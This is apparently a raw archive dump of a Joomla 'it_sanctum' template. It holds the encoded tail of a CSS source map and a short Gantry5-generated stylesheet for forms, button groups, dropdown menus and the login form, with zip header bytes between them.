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"}PK!%�'++<it_sanctum/custom/css-compiled/sanctum-joomla__body_only.cssnu&1i�/* GANTRY5 DEVELOPMENT MODE ENABLED.

   WARNING: This file is automatically generated by Gantry5. Any modifications to this file will be lost!

   For more information on modifying CSS, please read:

   http://docs.gantry.org/gantry5/configure/styles
   http://docs.gantry.org/gantry5/tutorials/adding-a-custom-style-sheet
 */

/* line 2, media/gantry5/engines/nucleus/scss/nucleus/mixins/_nav.scss */
/* line 12, media/gantry5/engines/nucleus/scss/nucleus/mixins/_nav.scss */
/* line 2, media/gantry5/engines/nucleus/scss/nucleus/mixins/_utilities.scss */
/* line 9, media/gantry5/engines/nucleus/scss/nucleus/mixins/_utilities.scss */
/* line 1, media/gantry5/engines/nucleus/scss/joomla/theme/_forms.scss */
legend {
  font-size: 1.3rem;
  line-height: 1.5;
}
/* line 6, media/gantry5/engines/nucleus/scss/joomla/theme/_forms.scss */
legend small {
  font-size: 0.8rem;
}
/* line 10, media/gantry5/engines/nucleus/scss/joomla/theme/_forms.scss */
.input-prepend > .add-on, .input-append > .add-on {
  line-height: 1.5;
}
/* line 1, templates/it_sanctum/scss/sanctum-joomla/_core.scss */
.btn-group > .btn + .dropdown-toggle {
  box-shadow: 1px 1px 1px rgba(0, 0, 0, 0.1);
}
/* line 5, templates/it_sanctum/scss/sanctum-joomla/_core.scss */
.btn-group.open .btn-primary.dropdown-toggle {
  background: #458334;
  color: #fff;
  box-shadow: inset -1px -1px 1px rgba(0, 0, 0, 0.15);
}
/* line 11, templates/it_sanctum/scss/sanctum-joomla/_core.scss */
.dropdown-menu > li > a:hover, .dropdown-menu > li > a:focus, .dropdown-submenu:hover > a, .dropdown-submenu:focus > a {
  background-image: none;
  background-color: #4f953b;
}
/* line 16, templates/it_sanctum/scss/sanctum-joomla/_core.scss */
.btn-link {
  color: #4f953b;
}
/* line 21, templates/it_sanctum/scss/sanctum-joomla/_core.scss */
#login-form {
  margin-bottom: 0;
}
/* line 23, templates/it_sanctum/scss/sanctum-joomla/_core.scss */
#login-form #form-login-remember {
  margin: 20px 0 10px;
}
